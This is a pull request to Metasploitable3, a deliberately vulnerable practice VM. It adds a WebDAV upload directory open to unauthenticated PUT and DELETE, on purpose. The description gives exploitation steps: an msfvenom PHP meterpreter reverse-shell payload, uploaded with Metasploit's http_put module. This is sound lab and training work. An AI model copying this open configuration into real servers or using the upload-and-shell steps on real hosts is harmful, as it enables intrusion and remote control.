### PR TITLE
Add WebDAV for Metasploitable3

### DIFF
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -84,6 +84,10 @@ Vagrant.configure("2") do |config|
   config.vm.provision :shell, path: "scripts/installs/install_rails_service.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
 
+  # Vulnerability - WebDAV
+  config.vm.provision :shell, path: "scripts/installs/setup_webdav.bat"
+  config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
+
   # Vulnerability - MySQL
   config.vm.provision :shell, path: "scripts/installs/setup_mysql.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614

--- a/resources/webdav/httpd-dav.conf
+++ b/resources/webdav/httpd-dav.conf
@@ -1,0 +1,45 @@
+#
+# Distributed authoring and versioning (WebDAV)
+#
+# Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias
+#                   mod_auth_digest, mod_authn_file
+#
+
+# The following example gives DAV write access to a directory called
+# "uploads" under the ServerRoot directory.
+#
+# The User/Group specified in httpd.conf needs to have write permissions
+# on the directory where the DavLockDB is placed and on any directory where
+# "Dav On" is specified.
+
+LoadModule dav_module modules/mod_dav.so
+LoadModule dav_fs_module modules/mod_dav_fs.so
+LoadModule dav_lock_module modules/mod_dav_lock.so
+
+DavLockDB "c:/wamp/DavLock"
+
+Alias /uploads "C:/wamp/www/uploads"
+
+<Directory "C:/wamp/www/uploads">
+    AllowOverride All
+    Dav On
+
+    <Limit GET HEAD POST DELETE OPTIONS PUT>
+        Order Allow,Deny
+        Allow from all
+    </Limit>
+</Directory>
+
+#
+# The following directives disable redirects on non-GET requests for
+# a directory that does not include the trailing slash.  This fixes a 
+# problem with several clients that do not appropriately handle 
+# redirects for folders with DAV methods.
+#
+BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully
+BrowserMatch "MS FrontPage" redirect-carefully
+BrowserMatch "^WebDrive" redirect-carefully
+BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully
+BrowserMatch "^gnome-vfs/1.0" redirect-carefully
+BrowserMatch "^XML Spy" redirect-carefully
+BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully

--- a/scripts/installs/setup_webdav.bat
+++ b/scripts/installs/setup_webdav.bat
@@ -1,0 +1,4 @@
+net stop wampapache
+mkdir C:\wamp\www\uploads\
+copy /Y C:\Vagrant\resources\webdav\httpd-dav.conf C:\wamp\alias
+net start wampapache


### PR DESCRIPTION
This adds WebDAV to Metasploitable. The PR replaces #13.

Verification:

- [ ] Do: ```vagrant destroy && vagrant up``` to build the image
- [ ] Once you're in the VM, you should see that port 8585 is running
- [ ] In your terminal, do: ```nc IP 8585```
- [ ] And then type: ```PUT /uploads/test.txt HTTP/1.0```, and then hit [ENTER] twice
- [ ] You should see that the server responds with **HTTP/1.1 201 Created**
- [ ] On Metasploitable3, if you go to C:\wamp\www\uploads, you should see the test.txt file

For exploitation:
- [ ] Generate a PHP meterpreter: ```./msfvenom -p php/meterpreter/reverse_tcp lhost=[IP] lport=5555 -f raw -o /tmp/evil.php```
- [ ] Open a msfconsole, and start a handler for the php/meterpreter/reverse_tcp
- [ ] Open another msfconsole, do: ```use auxiliary/scanner/http/http_put```
- [ ] Do: ```set FILEDATA file://tmp/evil.php```
- [ ] Do: ```set FILENAME evil.php```
- [ ] Do: ```set RHOSTS [IP]```
- [ ] Do: ```set RPORT 8585```
- [ ] Do: ```run```
- [ ] If http_put module hangs, check the other msfconsole, there might a payload session established. If you don't see a session, manually request: http://IP:8585/uploads/evil.php, and that should get you a session.